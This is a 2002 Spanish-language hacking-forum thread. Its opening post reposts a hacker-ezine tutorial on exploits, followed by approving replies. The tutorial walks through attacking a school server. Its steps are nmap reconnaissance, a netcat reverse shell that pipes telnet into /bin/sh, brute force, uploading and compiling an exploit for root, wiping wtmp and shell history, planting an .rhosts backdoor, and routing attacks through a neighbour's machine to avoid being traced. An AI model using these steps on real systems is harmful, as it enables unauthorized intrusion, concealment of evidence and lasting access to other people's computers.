elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
29 Agosto 2008, 22:19  



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Bugs y Exploits (Moderadores: sirdarckcat, berz3k)
| | |-+  ¿k es un exploit? miralo aki
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Imprimir
Autor Tema: ¿k es un exploit? miralo aki  (Leído 6359 veces)
JuanFran
Visitante


Email
¿k es un exploit? miralo aki
« en: 09 Noviembre 2002, 10:51 »

                    -+-| DisidentS Hack Journal #3 |-+-







  ________________________________________________________________________
 |                                                                        |
 |  -+- Titulo_____: Exploits [009.txt]                                   |
 |  -+- Autor______: mitr3in                                              |
 |  -+- E-Mail_____: mitreindisidnt@yahoo.es                              |
 |  -+- Team_______: Disidents España 2002 -  Los fuera de la ley         |
 |  -+- KB_________: 74.8                                                 |
 |  -+- Tema_______: Hacking                                              |
 |________________________________________________________________________|



.==========================================================================.
|===========~ INDICE ~======================================================
|===========================================================================
|=~ 1.0  Comentario                                                        |
|=~ 1.1  Terminos basicos                                                  |
|=~ 2.1  Terminos basicos                                                  |
|=~ 2.1  Teoria                                                            |
|=~ 2.2  Ejemplo                                                           |
|=~ 3.1  Limpieza de registros                                             |
|=~ 3.2  Recomendaciones                                                   |
|=~ 4.1  Algunos exploits indispensables                                   |
|=~ 4.2  Exploits                                                          |
|=~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~=.
======================================================~ INDICE ~============
============================================================================



.==========================================================================.
|=======~ 1.0 INTRODUCCION ~================================================
|===========================================================================


-Son  las 12:34  de la mañana hoy  a sabádo a nose  que de tal  mes, no  hay
novedades en el curro, te pica el gusanillo, no sabés lo que hacer en que te
entretienes,.... pues  miras  los textos, estudias  lo que se te antoja, que
haces?? PUes bien después de  toda una semana estresante te  decides a hacer
un texto para  sobre mmm, nose , que pues !!!! EXPLOITS ¡¡¡  que Buena idea,
así  pues  reconpilo lo que sé escribo un artículo y  lo comparto  con  todo
aquel  que   tenga  curiosidad  en  aprender  o  desarrollar   más  aun  sus
conocimientos sobre exploits, este artículo nose lo largo que será ni lo que
me tardará, sí se es que lo voy a hacer con toda mi  voluntad para ese gente
que son como yo,piensan como yo y ante todo no hacen mal a nadie (como yo..)
Bueno, me voy a dejar de rollos y vamos a empezar a tocar un poco el tema de
los exploits, vale peña???

-Antes de Nada me  gustaría deciros, que para esto  de los exploits, es casi
indispensable manejar un entorno Uníx, que cada uno se incline por el SO que
quiera bien por linux, o el que más le convenga ,  aunque claro también cabe
decir que hombre la verdad también se puede hackear y utilizar exploits bajo
güin2,  y  no es  por  poner  abajo  ni nada al sistema  operativo  ese  que
tantos millones saca al cabo del año, solo es por deciros mi opinión, bueno,
una vez dicho esto, debemos  saber también algunos comandos básicos  bien de
linux, o el sistema operativo que vayamos a utilizar, vaya ser  que entremos
en un sistema, y ni si quiera, sepamos, como se cambia  de directorio o como
podemos  borrar las huellas de un archivo  especifico, eso es básico. Bueno,
ahora bien, os voy a mostrar como os he dicho antes algunos comandos básicos
de linux en este caso:

.==========================================================================.
|=======~ 1.1 TERMINOS BASICOS ~============================================
|===========================================================================

# rm -->  Elimina un archivo
# cp --> Copia un archivo
# mv --> Mueve un archivo
# less o vi --> editor de texto
# chmod --> Permisos
# find --> Para buscar archivo /s
# chown --> Propiedad de de ficheros
# ls --> Muestra el contenido de un directorio
# chage --> Para anular cuentas de usuario
# at y batch --> Utilidad para programar tareas
# atq --> Muestra las tareas que hay pendientes
# chattr --> Cambiar atributos a los ficheros
# mount / umount --> Montar y desmontar unidades y .....
# bg --> Manda los comandos a un 2º Plano
# fg --> Mandas los comandos a un 1º Plano
# kill --> Para eliminar procesos
# finger --> Ver información de usuarios
# nc --> Navaja Suiza


.===========================================================================.
|=======~ 2.1 TEORIA ~=======================================================
|============================================================================

- Pues bien, que es un exploit?? ¿Que entiendes por un  exploit??
Cuando se  utilizan los exploits?? PUes la verdad es  que ni yo mismo lo  sé,
pero bueno intentarémos explicar algunas de estas preguntas o mejor,  profun-
dizar en este tema que poco a poco se está haciendo más importante y la mayo-
ria de  los textos que  hay están en ingles. Un exploit es  un programita que
se aprovecha de un bug (fallo de seguridad)  de un determinado programa  o SO
( sistema  operativo ), bien  este  programita se debe de compilar  tRansfor-
mArlo  A EjEcUtAbLE ) en la  máquina  en la cual queremos  correr el exploit,
es  decir,   de la que  nos  queremos  aprovechar de su  fallo  de  seguridad
bien  sea  por  que  tiene  un bug  en  el  ftp,  en el  SO ,  o por  que  su
administrador  de  seguridad  sea  tan  vago, que ni siquiera sepa que  tiene
cuatrocentos mil bugs en su sistema y servicios abiertos a toda la peña ;))))
XDD pues bien,lo primero que debemos hacer es acceder a la máquina de la cual
queremos aprovecharnos de  sus bugs para fines, siempre mmm,... (Bueno eso os
lo dejo a vuestro antojo ,jXDDDD).Sobre el tema de hackear esa maquina, o ese
server lo  siento pero no os voy acomentar como podeis conseguir acceso a ese
sistema ya que hay otros cuatrocentos mil textos de hacking para  que por  lo
menos  consigais acceder a una máquina con los permisos que sean pero siempre
tienes  que  tener por  lo  menos permiso  para  poder bajarte, (copiarte) el
exploit que luego más tarde será  compilado y  ejecutado,  ya  que gracias al
exploit que utilizemos podrémos tener todos los permisos que queramos,  no??,
que guay¡¡¡ no se te sube la adrenalina?? XDD!!! Pues bien, ahora una vez que
hayamos accedido al sistema,y tengamos el  exploit listo para compilar lo que
haremos será compilarlo(transformarlo a ejecutable para que se pueda ejecutar
en la máquina ese programita tan maravilloso que nos dará la cuenta de un tal
no se como se llama  root, kreo no se´pero, creo que  era la  cuenta  de  ese
hombre XDD!), bien estamos delante de nuesttra máquina que en realidad no es,
ya que estamos dentro de un server o  quien sabe lo mismo  delante del server
de tu empresa, amigo,...XD, bueno, una vez dicho esto nos disponemos a compi-
lar el programa, Uy bien y esto como se hace si ni si quiera tengo zorra idea
de como programar y menos de  compilar joder con los programs estos,pues bien
,eso es facil,para compilar un programa de C normalmente .c en entornos unix,
solo tendrémos que  escribir gcc exploit.c y nos saldrá o  nos  devolvera  un
programa llamado a.out es es el ejecutable,el programita ese que nos dará los
permisos del hombre ese tan importante root,XD, pues bien ahora,ejecutamos el
a.out # ./a.out y mmmmmmm,tachan!!!!!!! pReMIo  a  Ganado  USteD  una  MuñeCa
ChoChoNa, no hombre eso es  broma,  ibamos a estar nosotros aqui tanto tiempo
para  muñequita  de  esas.  Pues  ahora, solo  queda  decir que una  vez   el
programita ese nos ha convertido  en el hombre ese que  TIENE MUCHOS PERMISOS
Y HACE LO QUE QUIERE (como no preocuparse de la seguridad de la empresa).

Una  vez  dicho todo esto,  cabe  decir que  nunca  nos devemos olvidar de lo
que hemos hecho, ni  como, ni cuando, en  definitiva que hemos ido dejando un
rastro que hasta un  bebe con  pañales sucios, chupando aun la teta de lamama,
podría ver quien ha entrado en  ese servidor,  a que  hora, que  es lo que ha
echo, y  por  que  no  donde  vivimos, .., -X:(  bueno siempre  y  cuando  el
administrador no fuese tan vaGo CoMo deciamos ants XDD.


Bueno y  entonces  que  hacemos  ya que  hemos accedido al sistema, nos hemos
colado como si fuesemos, un colega  muy importante(root),y visto (curioseado)
lo que nos ha salido de  mmm.,. mXD,  pero no Hemos vorrado las  huellas esas
de chocolate que nos delatan, bueno no pasa nada PiSha, las borramos y punto,
ahora que somos  Tan Importantes en  ese servidor, no nos van a decir  que no
podemos borrar  nuestras huellas, porque  nos iban a negar eso,  cuando hemos
hecho up! ups! que  nada, nada.XDDD Bien, normalmente existen varios archivos
que guardan información de los accesos al ese sistema,normalmente son 4, pero
por  el que  más nos  devemos preocupar es por uno,ya que  este no lo podemos
modificar así como así,ya que el archivo dichoso este de .mm,.está en binario
que mala suerte tios,y ahora que hacemos y si el VaGo ese le dá por hacer al-
go un día y el archivo ese nos delata , uff!!! que mal huele eso X:)( no, pe-
ro si nos hemos bajado un  exploit al server,  y además somos tan importantes
(root) por que no bajarnos otro programita que nos borre del registro  ese...
"""EEUUUUReeeeeeEEEeKKKKaaAa!!! je, XDDD pues sí,tambien podemos ejecutar ese
programita  y listos,  asunto  arreglado, hemos  curioseado en el server  que
queriamos,el  administrador con lo vAgO que es ni se  ha dado cuenta y además
hemos limpiado nuestros registros, aunque no siempre queda todo limpio.

Los exploits,  nos  lo podemos encontrar por hay  en multitud  de páginas  de
seguridad,tales como  secureroot,astalavista(buscador  por excelencia hacker)
,...a. pero siempre nos debemos de asegurar de dar con el del bug que estamos
buscando,  explicándome  un poco mejor, que tenemos tenemos que tener cuidado
sobre que exploit utilizar no vayamos a hacerlo  a lo loco y en cuanto veamos
uno para el sendmail eeAA, pues este mismo, no, no ,  debemos  asegurarnos de
la  versión que es y poco a  poco todos los que vayamos  pillando  por hay en
las diferentes paginas o  donde sea, irlos guardando para  nuestra biblioteca
personal de exploits,bueno eso lo digo yo como opinión, ustedes haced  lo que
querais, XDD, bueno, tenemos  que  tener en  cuenta siempre que no  todos los
exploits  que encontremos  nos van a valer, ya  que  lo  mismo le ha dado  al
administrador por parchear algun programa o algo,así pues debemos buscar otra
vulnerabilidad, bueno, todo esto os  lo voy  a poner en un pequeño  ejemplito
con el  que vamos a practicar o por lo menos a ver  si nos hemos enterado  de
algo sobre como van los exploits, y todo el rollo ese,.


.==========================================================================.
|=======~ 2.2 EJEMPLO ~=====================================================
|===========================================================================

En primer lugar, elegimos el objetivo que en este caso va a ser mm pues,...
El servidor del insti, el servidor de tu viejo o yo que se,  pero todo lo que
hagais siempre bajo  vuestra responsabilidad,  que luego  no vengais diciendo
es que me dijo,que nose que , eh??¿ XDDD,  bien,je, (esto es solo un ejemplo,
lo que  hagais o  el objetivo que elijais va vuestra  responsability  XDDEd),
bueno,  una  vez que ya  hemos elegido  el  servidor lo  primero que  debemos
saber es la ip del insti (server),  bueno supongamos que no la sabemos  o que
aunque  tengamos  acceso  fisico  a  la  escuela  no  la vemos, coño si pongo

# netstat -n

y  me dice 192.168.1.13, y esta es la de la red, esta no nos vale, pues bien
hacemos  lo  siente nos mandamos un e-mail a  nuestra dirección de e-mail, y
listo  ahora  en  cuanto lleguemos a nuestra home,  miramos nuestro  e-mail,
propiedades y BinGo , ya tenemos la ip, ahora  solo nos queda todo  lo demás
que es en definitiva todo. Supongamos que la  ip es :  64.1.1.13 ahora bien,
empezamos a maniobrar y a entrar en materia:

Lo  primero  que debemos hacer es echarle un vistazo a los puertos que tiene
abierto el server ese y el sistema operativo que utiliza,que bien lo podemos
hacer utilizando el nmap o cualquier otro scaneador de puertos el  nmap para
ver sistema operativo o por intuición o con cualquier otro progamita de esos
que hay muchos como queso par linux,....

#nmap -O 64.1.1.13          (Para ver el SO que esta utilizando el servidor)
El sistema operativo también se puede averiguar viendo los puertos que tiene
abiertos el servidor,  por ejemplo si tiene entre ellos el 139, tiene muchas
posibilidades,  de que sea tenga W9X,  y si  tiene  135  y  139  seguramente
este basado en NT,...

#nmap -sT 64.1.1.13            (nmap tiene muchas opciones de scaneo esta es
                                la más simple,  y  también  con  la que  más
                                pronto nos  pueden ver que estamos scaneando
                                sus puertos por  eso, también  podemos hacer
                                otro tipo de scaneo, que es silencioso o así
                                por lo menos lo podemos llamar, que sería :
                                           #nmap -sS 64.1.1.13
                                este  scaneo  requiere  privilegios de root)

Algunos comandos del nmap

-   o archivo.txt --> Nos  guarda los resultados  obtenidos en un archivo
                          determinado

-   O --> Nos muestra el SO que usa

-   D --> Señuelo  para  saturar el sitio objetivo con información super-
              flua

-   Ident -->  Conocer la  identidad de un  usuario en una  conexión TCP,
                   puerto a la escucha 112.

Algunos comandos de la Navaja Suiza (Netcat o nc )

-   v --> Salidas detalladas, más detalladas - vv

-   z --> Gnera E/S en nodo cero

-   w2 --> Valor de tiempo de espera en cada puerto

También podemos sacar alguna información del server,
#finger @64.1.1.13
#whois 64.1.1.13
#rcpinfo -p 64.1.1.13

Otra  Utilidad  del Netcat,  para  crear un canal trasero o  telnet  inverso

# nc -1 -n -v -p 80 à Con esta opcion creamos el canal Trasero 1
# nc -1 -n -v -p 25 à Con esta otra, creamos el segundo canal

# /bin/telnet  80 | /sbin/sh/ | /bin/telnet  25 à
Nos da acceso al canal


Una vez que hemos hecho el escaneo de puerto nos  dirá los puertos que tiene
abiertos,  a raiz de hay podremos  empezar a buscar información  y como  no,
empezar  a  investigar un poco. Ya  sabemos  un  poco más  de ese  servidor,
podriamos decir que tiene  mm,  no se,  para empezar,  que  tienen  pues los
siguientes puertos abiertos:

# 21, 23, 25, 111, 6339,  bueno o los que tenga abiertos, la cuestion, a
                          investigar cada uno de ellos.

Ahora que ya sabemos el sistema operativo que utiliza, los puertos que tiene
abierto, y poco más,  podemos mirar  ahora,  las particiones  que tiene  que
nunca se sabe, lo mismo luego nos puede valer par mm.................

# showmount -e 64.1.1.13 ( Nos servirá para ver los directorios que se
 están compartiendo)

Bien, ya sabemos algo más, ahora podiamos echarle un vistazo a los programas
que estan rulando en el server en este momento,

#

Bueno, vamos bien por  lo pronto n0?? Lo vamos cojiendo todo??,  pues ahora,
que  tal  si  le echamos un vistazo  y  le  hacemos un  traceroute no?? Así,
además si tenemos suerte, nos podemos encontrar con algun numero de telefono,
a nombre de a quien está registrado y quien sabe luego nos pueda servir para
ingeniria social,  ..etc, etc,  # traceroute 64.1.1.13   (Con esto vemos por
que maquinas o servidores  pasa el  ordenador  o  el  servidor ese), tambien
podemos  utilizar otro  tracer  o el de windows,  o  el mm, nose,  a vuestra
elección , (neotracer para güin2, ) o tracert para ms-dos,...

Mmmmm, que más, pues ahora bien,  ya visto  hasta ahora  todo  esto ,  queda
lo  más  difícil,  intentar  entrar en la máquina 64.1.1.13, pero bueno todo
lo  que hemos hecho para sacar un poco de información,  se podia  haber echo
más complejo, eso os lo dejo para que ustedes investiguen y vean poco a poco
también podriamos ver los usuarios que están en ese momento, o otra cosa muy
util a la hora de hackear por si no es en nuestro pais es saber la hora  que
es allí,para ver si están durmiendo, si el administrador esta en plena faena
o quizás quien sabe...mm...

Ahora que ya tenemos lo que he dicho antes,  podemos hacer varias cosas, una
de ellas, sería realizar un ataque por fuerza bruta a través de telnet, ftp,
rlogin, SSH, POP, http, etc,..,  lo  que  pasa es  que este tipo de ataques,
se suele hacer  ya a la  desesperada aunque muchas  veces nos funciona  pero
claro que sí con mucha paciencia tios, que si no... nada de nada, aquí  todo
con  paciencia  y  poquito  a  poco,  también,  podemos ver los usuarios que
existen  para  ese  sistema  operativo  por defecto  y  quizas,  quien sabe,
lo mismo cuela alguno no?? O anonymous , que también la mayoría de las
veces nos deja por lo menos ufff, hacer cositas,jejiejeje.

Bueno bien, hacemos empezamos a maniobrar:-XDddddddd

# telnet  64.1.1.13 (Puerto que tenía abierto)

Dependiendo el telnet a que puerto lo realicemos,  obtendremos distinto tipo
de información o de acceso, por ejemplo, si hacemos :

# telnet 64.1.1.13  25   à

Podremos ver el servidor de correo que esta rulando,además de acceder quizas
como  usuario anonymous,  también  haciendo # telnet 64.1.1.13  ( )  Veremos
la hora que es  para  esa  maquina, todo esto claro siempre y cuando hagamos
telnet a los  puertos que estén abiertos y si el firewall,  si tiene nos  lo
permite  hacer.,XDDDD , Una  vez hecho  esto y  tener ya tope de información
lo  que debemos  hacer ahora  es  intentar entrar  en  la  máquina esa  bien
utilizando la técnica que sea, ataques de fuerza bruta,negación de servicios
, ingenieria social, ..

Supongamos  que ya hemos conseguido a  traves de alguna técnica de las antes
mencionadas  o otra  cualquiera, entrar  en  el  ordenador  objetivo

< anonymous@64.1.1.13>  Una  vez  estamos  dentro lo  que debemos hacer será
llevarnos nuestro exploit a esta máquina con el comando put para que podamos
ejecutar  el  exploit, para  llevarnos  varios ficheros  utilizariamos mput.
Sin  olvidarnos  que no solo debemos subirnos el  exploits, sino tambien, el
exploit para la limpieza de registro que luego se nos vaya a olvidar o bueno
sino a mano, con destonillador y alicates.

< anonymous@64.1.1.13  > # gcc  -o exploit exploit.c
      ( esto nos compilará el exploit para su posterior ejecución)

 #  ./exploit
                          (Ejecutamos el exploit)
bug exploit successfully!
boeyly
Wallllaaaaaaaaaaaaa.

 #   Ya somos root aquel hombre tan importante que os decia
                      que podía hacer casi lo que quería jeje,ejej,.XDDD.
        ..........   .............        ..............

Ahora lo  que hagais va vuestra responsabilidad,  y  ojo con lo  que  hagais
tios.... Una  vez, hayais  echo lo  que querais,  bien  podeis  utilizar  el
programita  ese  que os he dicho para  borrar las huellas, o bien, hacerlo a
mano, empezando por modificar los archivos   Bueno una vez limpiado nuestras
huellas, podemos hacer varias cosas, desde dejar un troyano para que podamos
tener  acceso  a  esa  maquina  en  un futuro  o largarnos  y  todo acabado,
si vuestra opción es la de salir ea, pues # quit  o ctrl. - C  más rápido  y
asunto acabado, pero si vuestro ego, quiere más y vuestra adrenalina quereis
que suba en un futuro otra vez, lo que debemos hacer es dejar un  troyano en
esa máquina con mucho cuidado se vaya a dar cuenta el adm.Un troyano podemos
hacerlos nosotros o bien utilizar uno  ya diseñado, si  lo realmente  nos lo
queremos fabricar bueno enrealidad no  hay que fabricar nada , solo dejarnos
una puerta  abierta a  nuestro antojo para cuando queramos pasar, jejeXDDDD,
para hacer eso que os digo, lo que debemos haces es:

En  primer lugar, será crear  un  archivo  rhost, y ahí  poner el nombre  de
usuario el  cual queremos que pueda acceder al sistema y este cuando le haga
un rlogin, no le pedirá contraseña, lo que hacemos realmente es decirle a la
maquina mendiante ese archivo, es que  tenga confianza en ese usuario  y así
pues acceder a su sistema cada vez que queramos.  Todo esto lo debemos hacer
antes  de  limpiar  las  huellas del  registro, y así   pues  al  limpiarlas
estaresmos limpiando tambien este ultimo rastro que hemos ido dejando,aunque
el dejar un troyano, a su vez, indica también, dejar más huellas,pero bueno,
habrá que arriesgarse no?,esto cada uno que haga lo que quiera con su vida y
su ordenador ,XDDD. Aunque como siempre os digo estas cosas, funcionan si el
administrador  no las tiene  un poco protegidas  claro está,  lo mismo  pasa
ejemplo periódicamente de borrar los  archivos r* o encryptarlos o ..etc,...

.==========================================================================.
|=======~ 3.1 LIMPIEZA DE REGISTROS ~=======================================
|===========================================================================

Editar  o  Modificar  archivos:  messages,  secure  ( sitios  o  usuarios no
reconocidos  o  intentos  de  conexion ), xferlog  (  Actividad  anormal  de
transferencia de archivos), wtmp (guarda un registro, de cada usuario que se
introduce  o  sale del sistema), lastlog (inicios de sesion extraños), utmp,
normalmente ubicados en /var/log, aunque no siempre están en ese directorio,
ya que depende del SO y del administrador.

Wtmp --> Este Archivo está en binario, con lo cual su  limpieza será un poco
         mas difícil, para su limpieza, podemos utilizar algun programa como
         podría ser el wzap.c

   # /var/log/who ./wtmp

   # /opt/wzap
      Seguidamente introduciriamos el usuario a limpiar del registro,

   # copy wtmp.out  a wtmp à
     Así con esto, habremos limpiado nuestras huellas de este archivo en
     binario (wtmp).

También debemos de tener en cuenta los propios mandatos que utilizamos que se
pueden  guardar  automáticamente  en  /bin/bash/bash_history,  si  al atacar,
desactivamos  la  historia de la shell,  no generaremos archivos  historicos,
para desactivar esta opcion, utilizaríamos:

# unset HISTFILE; unset SAVEHIST
Para restablecer la fecha y hora del  ultimo acceso al sistema, usad "touch"


Bueno, pues que  tal os ha  parecido el ejemplo??    Espero  que  lo  hayais
entendido todo un poco mejor, ahora a continuación os  daré algunos exploits
y programitas para vuestra biblioteca particular, bueno, darle un buen uso a
esta información.


.==========================================================================.
|=======~ 3.2. RECOMENDACIONES ~============================================
|===========================================================================


Siempre habremos dejado algo que nos pueda delatar, así que como opinión mia,
olvidate de hacer destrozos, y nunca te metas en grandes compañias o servido-
res que  se  puedan gastarse  el dinero  en  buscarte,  y creeme  si  quieren
te encontrarán, y pss para que, para que luego te arrepientas  de todo lo que
has hecho y nunca más puedas coger un ordenador no pisha, mejor NO, así X que
OJO ::::;;;; )) con lo que haces colega.

Tener mucho cuidado con las grandes compañias, ya que se pueden permitir  el
lujo, de gastarse dinero en perseguiros. También debeis tener  mucho cuidado
con la BSA y nunca confieis  en nadie,  el que menos os penseis  os dara por
donde menos lo espereis,  otra cosa  a  tener en cuentas es que  siempre que
podais jakear con condón (jakear con condón:hackear un sity o una maquina la
de tu vecino  por  ejemplo, utilizarla,  y  a  través de  ella, hacker donde
querais),  así,  será  mas dificil que   os sigan el rastro,  también podeis
utilizar  para esto proxys para la ocultación de vuestras ips, que luego nos
podrían delatar ;) XDd

Ahora a continuación  os daré algunos exploits, para que os  entretengais un
poquito y siempre todo lo que hagais o el uso que le deis a esta información
será bajo vuestra responsabilidad, ya que yo no me hago cargo  de nada de lo
aquí expuesto solo me  dedico a mostraros información que es  gratuita  para
todo el mundo y  que todo el mundo debería  saber, Suerte  PeÑa , y rEcOrDaR
NunCa  sUbeStImeIS  al  projimo,tambien me  gustaría deciros, que  nunca  os
vendría  mal  saber algo sobre  cracking o lenguajes de programación, ya que
todo  eso  ayudaría bastante  a  entender  lo que hacen  los exploits,  o  a
crearselos uno mismo.

.==========================================================================.
|=======~ 4.1 ALGUNOS EXPLOITS ~============================================
|===========================================================================

A medida que avanzan los dias, avanzan los exploits y los fallos de seguridad
(bugs),  ya que continuamente están saliendo nuevos bugs, normalmente,  nunca
tendremos  nuestro sistema protegido  totalmente,  ya  que  cada  dia  minuto
que pasa o cada hora aparece una nueva vulnerabilidad y nos os creais eso que
dicen que no ese SO no tiene puertas abiertas,o quees inmune contra todo tipo
de ataques ya que es mentira, bien tarde una semana, un mes o lo que sea,pero
al final siempre  se encontrará alguna  vulnerabilidad bien sea  en el código
algun error, o alguna  puerta  que  se  hayan dejado abierta XDD ;), Asi  que
nuestro objetivo es estar al dia, y cada vez que  nos enteremos  de algun bug
nuevo intentar parchearnos para no correr riesgos de intrusion.

Por eso, ahora os voy a mostrar algun ejemplo de exploits, aunque ya sebeis,
debeis  buscar el que os haga falta,  porque  hay la tira por ahí,  y  nunca
utilizeis  uno  por utilizar, pero bueno haya vosostros, ah! y bueno la tra-
ducción de los comentarios de los exploits  ha sido facilitada por  damicita
hi! princess! ;) q bueno, como  no todos  dominamos perfectamente  el ingles
puess... xddD  saluditos.

Este es un programita el cual te permitirá la limpieza de en el registro del
sistema facilitado por el Team disidents .




<++> disidentszapp.c


              DISIDENTS - LOS FUERA DE LA LEY 2001
                        DISIDENTSZAPP by DDiego
--INSTALACION:
1ª Unos guantes, una botella de vodka y un compilador
2ª gcc -o disidentszapp disidentszapp.c   - Si no sabias lo de los guantes
y el vodka, no creo que lo necesites
-- RECOMENDACIONES
Ir 1ª a por los servicios ftpd, smtp etc y luego darle a la A
-- AYUDA: Si quereis que incluya algun log de otro servicio en el zapper etc, podeis
escribir a disidents@hotmail.com o disidents@yahoo.es, un saludo

Esta informacion a sido proporcionada por: http://www6.gratisweb.com/disidents/ascii/ezine/exploits.html
En línea
DesTruçToR

Desconectado Desconectado

Mensajes: 1.849


Nos veremos...


Ver Perfil
Re:¿k es un exploit? miralo aki
« Respuesta #1 en: 09 Noviembre 2002, 19:55 »

eso abria kedao mejor en la sección de cursos....
En línea

Soy la voz que nadie escucha, el portador de las noticias de la yegada del mal, la yegada de la oscuridad y del KAOS. Del fin de la existencia...
Ninrodel

Desconectado Desconectado

Mensajes: 242


El que busca la verdad corre el riesgo de encontra


Ver Perfil
Re:¿k es un exploit? miralo aki
« Respuesta #2 en: 09 Noviembre 2002, 21:55 »

K va, yo kreo k esta bien donde esta... se ha preguntado varias veces q es un exploit  ;)
En línea

Si mi teoría de la relatividad es exacta, los alemanes dirán que soy alemán y los franceses que soy ciudadano del mundo. Pero si no lo es, los franceses dirán que soy alemán, y los alemanes que soy judío.

Albert Einstein
Rojodos
"If you wanna be free, you must be different"

Desconectado Desconectado

Mensajes: 3.525



Ver Perfil
Re:¿k es un exploit? miralo aki
« Respuesta #3 en: 10 Noviembre 2002, 01:24 »

Muy buen texto, juanfran

Permiteme que le ponga una chinchetita......  8)
En línea
Jhim

Desconectado Desconectado

Mensajes: 131


xDDDDDDD


Ver Perfil WWW
Re:¿k es un exploit? miralo aki
« Respuesta #4 en: 10 Noviembre 2002, 01:43 »

Esto estaria mejor en la sección de cursos no?????
En línea

Kz-team
Lg

Desconectado Desconectado

Mensajes: 55



Ver Perfil
Re:¿k es un exploit? miralo aki
« Respuesta #5 en: 10 Noviembre 2002, 05:29 »

 ;) Realmente muy buena explicacion!!!
Gracias por hacerlo tan claro, ahora sé mejor que es un exploit  :D
Li
En línea

"la muerte esta tan segura de alcanzarte, que te da toda una vida de ventaja"
SATAN

Desconectado Desconectado

Mensajes: 145


¡Amo YaBB SE!


Ver Perfil WWW
Re:¿k es un exploit? miralo aki
« Respuesta #6 en: 10 Noviembre 2002, 06:05 »

HASTA GLAUCOMA ME DA DE TANTO LEER UN TEXTO QUE ES VIEJO
En línea
shinchan
Visitante


Email
Re:¿k es un exploit? miralo aki
« Respuesta #7 en: 10 Noviembre 2002, 14:06 »

miran tengo una duda... cuando conecto a una makina por telnet y pongo el user y pass.. que tengo..para meterle un exploit... para poder ejecutarlo ... cuando estoy dentro que hago  un put y k mas..
q pondria
$put exploit
y asi se subiria o komo vamos esa es mi duda de komo subir el exploit de mi makina a la remota???

ante todo Gracias
En línea
mauro.

Desconectado Desconectado

Mensajes: 5



Ver Perfil
Re:¿k es un exploit? miralo aki
« Respuesta #8 en: 18 Noviembre 2002, 14:34 »

gracias....
En línea
Lokito
Visitante


Email
SeSeSE
« Respuesta #9 en: 24 Noviembre 2002, 01:03 »

Grx por naaaa !!!  ;D ;D ;D ;D
En línea
NAro

Desconectado Desconectado

Mensajes: 252


XDDDDDD


Ver Perfil WWW
Re:¿k es un exploit? miralo aki
« Respuesta #10 en: 28 Noviembre 2002, 05:47 »

Juan fran muy bueno tu post es q lo as explicado para q lo entienda cualquiera y eso es bueno por no faltamos los q busca por google y nos encontramos con una explicacion casi de libros q al final nadie lo entiende pero tu explicacion la cago esta pulenta.
asi q vale un saludo .
un saludo tb al foro y a rojodos.
y al crow si esta aca nose weno no importa salu2
 8)
______________-
dEjAd Q lAs ComPuTadOras veNaAGn A mI q dE eLlas El El ReyNo dE lAS rEdEs
En línea

..::NAro DesDe En UnDerGrOunD...Las froNterAs de eSte Mundo AbtrAcTo No EXiSTen,SOlO
    ExiSteN PAra Los Q CReEN EN eLlAS..::
KaYZeR

Desconectado Desconectado

Mensajes: 109


Web dedicada a mi niña,, razon de mi vida :o)


Ver Perfil WWW
Re:¿k es un exploit? miralo aki
« Respuesta #11 en: 03 Diciembre 2002, 12:38 »

Deberia estar en otra sección,,,

Ademas Ninrodel no siempre tienes que preguntar, en algunos temas debes investigar por tu cuenta, sobre todo con los xploit que hay informacion de sobra para leer.

Critica en buena onda. ;)
En línea

"La humildad es la practica de la sabiduria" Yo(P.U.M.)
"El arte de la guerra consiste en vencer al enemigo sin combatirlo" Sunzi.
"Hasta el hilo mas delgado hace su sombra en el suelo" .
"Primero hare lo necesario, luego lo posible y terminare haciendo l
Creature

Desconectado Desconectado

Mensajes: 1.775


Mitad bohemio, mitad caballero


Ver Perfil WWW
Re:¿k es un exploit? miralo aki
« Respuesta #12 en: 07 Diciembre 2002, 01:51 »

yo creo que esta bien posteado aqui... no perjudica a nadie, al contrario ayuda  :)

Salu2!! y gracias JuanFran !  ;)
En línea

Toma mi mano sigueme, te mostrare lo que tu alma no ve!
por equipaje solo lleva tu fé, por escudero el valor sieempree teen!
Kommander

Desconectado Desconectado

Mensajes: 29


¡Amo YaBB SE!


Ver Perfil
Re:¿k es un exploit? miralo aki
« Respuesta #13 en: 09 Diciembre 2002, 21:50 »

Buena explicacion sobre el xploit y bastante bueno para los newbies tal vez asi no preguntaran tantas veces lo mismo  >:(
Da igual adonde lo posteas ademas aca es mas rapido buscarlo sin entrar a la sección de cursos ademas es hack o no ....  ;D
En línea
NaNo N´RoSeS

Desconectado Desconectado

Mensajes: 256

..::NaNo Fuck´N RoSeS::..


Ver Perfil WWW
Re:¿k es un exploit? miralo aki
« Respuesta #14 en: 13 Diciembre 2002, 06:23 »

ta buena  tu descripcion te felicito  , yo ¡ ¡ ¡ ¡  por lo menos  no tenia ni idea de que era un exploit  pero ahora lo cacho a la perfeccion jajajjaja
  salu2¡ ¡ ¡ ¡ ¡

>>>NANOnROSES<<<
En línea



Páginas: [1] 2 Ir Arriba Imprimir 
Ir a:  





Consolas     La Web de Goku     MilW0rm     MundoDivx

Hispabyte     Truzone     TodoReviews     ZonaPhotoshop

hard-h2o modding    Foros de ayuda    Yashira.org    Videojuegos    indetectables.net   

Noticias Informatica    Seguridad Informática    ADSL    Foros en español    eNYe Sec

Todas las webs afiliadas están libres de publicidad engañosa.

Powered by SMF 1.1.5 | SMF © 2006-2008, Simple Machines LLC